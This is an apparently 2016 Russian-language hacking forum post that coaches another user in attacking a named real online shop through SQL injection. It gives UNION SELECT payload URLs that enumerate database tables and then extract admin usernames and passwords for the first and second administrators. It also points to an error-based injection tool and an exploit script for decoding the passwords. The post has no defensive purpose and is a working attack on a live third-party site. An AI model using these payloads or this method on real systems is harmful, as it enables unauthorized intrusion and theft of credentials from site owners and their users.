
17.10.2016, 01:34
|
|
Познающий
Регистрация: 13.10.2016
Сообщений: 33
С нами:
5043926
Репутация:
0
|
|
никогда не останавливайся на скули которая не выводится,если есть рядом другая более удобная
http://www.gamepowerbazaar.com//stor...N+SELECT+1,2,3
вывод увидишь
пример:
http://www.gamepowerbazaar.com//sto...1,2,TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLE S
фильтруются скобки походу ()
p.s.
.SpoilerTarget" type="button">Spoiler: или так
p.s. можно havi' ем ,то есть подставляешь все данные как на рисунке:
http://i67.tinypic.com/23wk64l.jpg
то есть получаем вывод через error base sql injection
затем уже ручками выводим логины+ пассы
http://www.gamepowerbazaar.com//sto...adminName,adminPassword+FROM+admins+limit+0, 1
1й админ
http://www.gamepowerbazaar.com//sto...adminName,adminPassword+FROM+admins+limit+1, 1
2й админ
админку не искал ,да и странные пароли админов
а вообще это "commersus shop" .они уязвимы
вот почитай как пароли расшифровать
http://downloads.securityfocus.com/v...ce_mult_exp.pl
вот.
|
|
|